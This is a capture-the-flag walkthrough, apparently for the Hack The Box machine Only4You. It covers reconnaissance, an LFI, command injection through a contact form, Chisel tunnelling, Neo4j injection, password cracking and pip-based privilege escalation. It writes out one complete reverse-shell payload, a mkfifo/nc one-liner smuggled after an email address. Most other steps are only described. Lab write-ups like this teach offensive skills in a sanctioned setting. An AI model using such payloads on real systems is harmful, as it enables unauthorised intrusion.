Recon

We start launching a nmap port scan, in specific with a TCP port scan to identify the open ports on the machine.

We found 2 ports open

Port 80 - HTTP
Port 22 - SSH

With some basics scripts of recon, luanch a second scan to found the version and name of the services running on it.

Add page to Hosts file

lets add the domain to /etc/hosts file

and show it in a browser

Enumeration

I use GoBuster, but you can use your favorite tool to bruteforce and discovery subdomains:

We found one subdomain beta.only4you.htb lets add it to /etc/hosts file.

We see a website like this:

Download and explote the source code for vulns.

We found a LFI Vuln:

Let's try something with it:

We can read the /etc/passwd file of the machine. Let's try to read the app.py

We found a method executing python. So we can try to insert a payload on the contact form of the main page

Using BurpSuite Intercept the traffic and laod a payload to open a shell with nc.

Reverse Shell:

ewrc01@ewrc01.com|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP 4444 >/tmp/f

And you need to urlcode it in burpsuite and send it with repeater:

And in the other screen with nc -lvnp 4444

Port Forwarding using Chisel

We can use Chisel server and Chisel client to Port Worwarding, you can download it from Here

Start a Python Server on your main machine:

and use wget to download it on the victim machine:

And init a server with Chisel in your attacker machine:

And in your victim machine:

Give exec Permissions to chisel with chmod + x

and start chisel client ``

and open http://127.0.0.1:8001/ On your attacker machine:

We found a login try basic user and password like admin:admin and it works

In the employees pages we see a search field:

if you remember port 7474 is open on the machine and the only usually running on the port is Neo4J

Lets try some payloads for the database:

and start a python server to see results:

We found the user and password, lets crack it!

and we found the password lets use it on ssh and on localhost:3000

Localhost:3000

User Flag

and in ssh:

Privilege Scalation

To privilege scalation we can use a tool developed by yu8pentest on github, this tool perform an attack when you use the command pip install or pip download if we execute sudo -l:

We found we have enough privileges to execute pip3 download

So we download the source code of the tool on GitHub

Go to Git

And we edit the app.py on it like this:

Them make a build with python -m build

And the result is a file like this:

Lets start a new repo on http://localhost:3000

Follow the instructions of git:

And download it on victim machine:

look at it :

and execute the following lines:

Root Flag

And Congrats! you have pwned Only4You Machine.